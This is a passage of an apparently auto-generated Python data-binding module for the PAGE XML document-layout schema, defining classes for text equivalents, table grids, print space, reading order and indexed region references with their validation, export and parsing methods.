self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
if value > 1:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
def validate_TextDataTypeSimpleType(self, value):
# Validate type pc:TextDataTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['xsd:decimal', 'xsd:float', 'xsd:integer', 'xsd:boolean', 'xsd:date', 'xsd:time', 'xsd:dateTime', 'xsd:string', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextDataTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.PlainText is not None or
self.Unicode is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='TextEquivType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextEquivType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'TextEquivType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextEquivType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextEquivType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextEquivType'):
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
if self.conf is not None and 'conf' not in already_processed:
already_processed.add('conf')
outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
if self.dataType is not None and 'dataType' not in already_processed:
already_processed.add('dataType')
outfile.write(' dataType=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.dataType), input_name='dataType')), ))
if self.dataTypeDetails is not None and 'dataTypeDetails' not in already_processed:
already_processed.add('dataTypeDetails')
outfile.write(' dataTypeDetails=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.dataTypeDetails), input_name='dataTypeDetails')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='TextEquivType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.PlainText is not None:
namespaceprefix_ = self.PlainText_nsprefix_ + ':' if (UseCapturedNS_ and self.PlainText_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sPlainText>%s</%sPlainText>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.PlainText), input_name='PlainText')), namespaceprefix_ , eol_))
if self.Unicode is not None:
namespaceprefix_ = self.Unicode_nsprefix_ + ':' if (UseCapturedNS_ and self.Unicode_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sUnicode>%s</%sUnicode>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Unicode), input_name='Unicode')), namespaceprefix_ , eol_))
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
self.validate_indexType(self.index) # validate type indexType
value = find_attr_value_('conf', node)
if value is not None and 'conf' not in already_processed:
already_processed.add('conf')
value = self.gds_parse_float(value, node, 'conf')
self.conf = value
self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
value = find_attr_value_('dataType', node)
if value is not None and 'dataType' not in already_processed:
already_processed.add('dataType')
self.dataType = value
self.validate_TextDataTypeSimpleType(self.dataType) # validate type TextDataTypeSimpleType
value = find_attr_value_('dataTypeDetails', node)
if value is not None and 'dataTypeDetails' not in already_processed:
already_processed.add('dataTypeDetails')
self.dataTypeDetails = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'PlainText':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'PlainText')
value_ = self.gds_validate_string(value_, node, 'PlainText')
self.PlainText = value_
self.PlainText_nsprefix_ = child_.prefix
elif nodeName_ == 'Unicode':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'Unicode')
value_ = self.gds_validate_string(value_, node, 'Unicode')
self.Unicode = value_
self.Unicode_nsprefix_ = child_.prefix
# end class TextEquivType
class GridType(GeneratedsSuper):
"""Matrix of grid points defining the table grid on the page."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('GridPoints', 'GridPointsType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '2', 'name': 'GridPoints', 'type': 'GridPointsType'}, None),
]
subclass = None
superclass = None
def __init__(self, GridPoints=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
if GridPoints is None:
self.GridPoints = []
else:
self.GridPoints = GridPoints
self.GridPoints_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GridType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GridType.subclass:
return GridType.subclass(*args_, **kwargs_)
else:
return GridType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_GridPoints(self):
return self.GridPoints
def set_GridPoints(self, GridPoints):
self.GridPoints = GridPoints
def add_GridPoints(self, value):
self.GridPoints.append(value)
def insert_GridPoints_at(self, index, value):
self.GridPoints.insert(index, value)
def replace_GridPoints_at(self, index, value):
self.GridPoints[index] = value
def hasContent_(self):
if (
self.GridPoints
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GridType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GridType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GridType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GridType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GridType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for GridPoints_ in self.GridPoints:
namespaceprefix_ = self.GridPoints_nsprefix_ + ':' if (UseCapturedNS_ and self.GridPoints_nsprefix_) else ''
GridPoints_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GridPoints', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'GridPoints':
obj_ = GridPointsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.GridPoints.append(obj_)
obj_.original_tagname_ = 'GridPoints'
# end class GridType
class GridPointsType(GeneratedsSuper):
"""Points with x,y coordinates.
The grid row index"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('points', 'pc:PointsType', 0, 0, {'use': 'required'}),
]
subclass = None
superclass = None
def __init__(self, index=None, points=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.index = _cast(int, index)
self.index_nsprefix_ = None
self.points = _cast(None, points)
self.points_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GridPointsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GridPointsType.subclass:
return GridPointsType.subclass(*args_, **kwargs_)
else:
return GridPointsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def get_points(self):
return self.points
def set_points(self, points):
self.points = points
def validate_PointsType(self, value):
# Validate type pc:PointsType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
if not self.gds_validate_simple_patterns(
self.validate_PointsType_patterns_, value):
self.gds_collector_.add_message('Value "%s" does not match xsd pattern restrictions: %s' % (encode_str_2_3(value), self.validate_PointsType_patterns_, ))
validate_PointsType_patterns_ = [['^(([0-9]+,[0-9]+ )+([0-9]+,[0-9]+))$']]
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridPointsType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GridPointsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GridPointsType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GridPointsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GridPointsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GridPointsType'):
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
if self.points is not None and 'points' not in already_processed:
already_processed.add('points')
outfile.write(' points=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.points), input_name='points')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridPointsType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
value = find_attr_value_('points', node)
if value is not None and 'points' not in already_processed:
already_processed.add('points')
self.points = value
self.validate_PointsType(self.points) # validate type PointsType
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class GridPointsType
class PrintSpaceType(GeneratedsSuper):
"""Determines the effective area on the paper of a printed page.
Its size is equal for all pages of a book
(exceptions: titlepage, multipage pictures).
It contains all living elements (except marginals)
like body type, footnotes, headings, running titles.
It does not contain pagenumber (if not part of running title),
marginals, signature mark, preview words."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
]
subclass = None
superclass = None
def __init__(self, Coords=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, PrintSpaceType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if PrintSpaceType.subclass:
return PrintSpaceType.subclass(*args_, **kwargs_)
else:
return PrintSpaceType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def hasContent_(self):
if (
self.Coords is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PrintSpaceType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('PrintSpaceType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'PrintSpaceType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PrintSpaceType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PrintSpaceType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PrintSpaceType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PrintSpaceType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class PrintSpaceType
class ReadingOrderType(GeneratedsSuper):
"""Definition of the reading order within the page.
To express a reading order between elements
they have to be included in an OrderedGroup.
Groups may contain further groups.
Confidence value (between 0 and 1)"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('OrderedGroup', 'OrderedGroupType', 0, 0, {'name': 'OrderedGroup', 'type': 'OrderedGroupType'}, 2),
MemberSpec_('UnorderedGroup', 'UnorderedGroupType', 0, 0, {'name': 'UnorderedGroup', 'type': 'UnorderedGroupType'}, 2),
]
subclass = None
superclass = None
def __init__(self, conf=None, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.conf = _cast(float, conf)
self.conf_nsprefix_ = None
self.OrderedGroup = OrderedGroup
self.OrderedGroup_nsprefix_ = "pc"
self.UnorderedGroup = UnorderedGroup
self.UnorderedGroup_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ReadingOrderType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ReadingOrderType.subclass:
return ReadingOrderType.subclass(*args_, **kwargs_)
else:
return ReadingOrderType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_OrderedGroup(self):
return self.OrderedGroup
def set_OrderedGroup(self, OrderedGroup):
self.OrderedGroup = OrderedGroup
def get_UnorderedGroup(self):
return self.UnorderedGroup
def set_UnorderedGroup(self, UnorderedGroup):
self.UnorderedGroup = UnorderedGroup
def get_conf(self):
return self.conf
def set_conf(self, conf):
self.conf = conf
def validate_ConfSimpleType(self, value):
# Validate type pc:ConfSimpleType, a restriction on float.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, float):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
if value > 1:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.OrderedGroup is not None or
self.UnorderedGroup is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ReadingOrderType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReadingOrderType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ReadingOrderType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ReadingOrderType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ReadingOrderType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ReadingOrderType'):
if self.conf is not None and 'conf' not in already_processed:
already_processed.add('conf')
outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ReadingOrderType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.OrderedGroup is not None:
namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
self.OrderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
if self.UnorderedGroup is not None:
namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
self.UnorderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('conf', node)
if value is not None and 'conf' not in already_processed:
already_processed.add('conf')
value = self.gds_parse_float(value, node, 'conf')
self.conf = value
self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'OrderedGroup':
obj_ = OrderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.OrderedGroup = obj_
obj_.original_tagname_ = 'OrderedGroup'
elif nodeName_ == 'UnorderedGroup':
obj_ = UnorderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnorderedGroup = obj_
obj_.original_tagname_ = 'UnorderedGroup'
# end class ReadingOrderType
class RegionRefIndexedType(GeneratedsSuper):
"""Numbered regionPosition (order number) of this item within the current
hierarchy level."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('regionRef', 'string', 0, 0, {'use': 'required'}),
]
subclass = None
superclass = None
def __init__(self, index=None, regionRef=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.index = _cast(int, index)
self.index_nsprefix_ = None
self.regionRef = _cast(None, regionRef)
self.regionRef_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RegionRefIndexedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RegionRefIndexedType.subclass:
return RegionRefIndexedType.subclass(*args_, **kwargs_)
else:
return RegionRefIndexedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def get_regionRef(self):
return self.regionRef
def set_regionRef(self, regionRef):
self.regionRef = regionRef
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefIndexedType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionRefIndexedType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RegionRefIndexedType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionRefIndexedType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionRefIndexedType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionRefIndexedType'):
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
if self.regionRef is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefIndexedType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
value = find_attr_value_('regionRef', node)
if value is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
self.regionRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class RegionRefIndexedType
class OrderedGroupIndexedType(GeneratedsSuper):
"""Indexed group containing ordered elements
Optional link to a parent region of nested regions.
The parent region doubles as reading order group.
Only the nested regions should be allowed as group members.
Position (order number) of this item within the
current hierarchy level.
Is this group a continuation of another group (from
previous column or page, for example)?
For generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
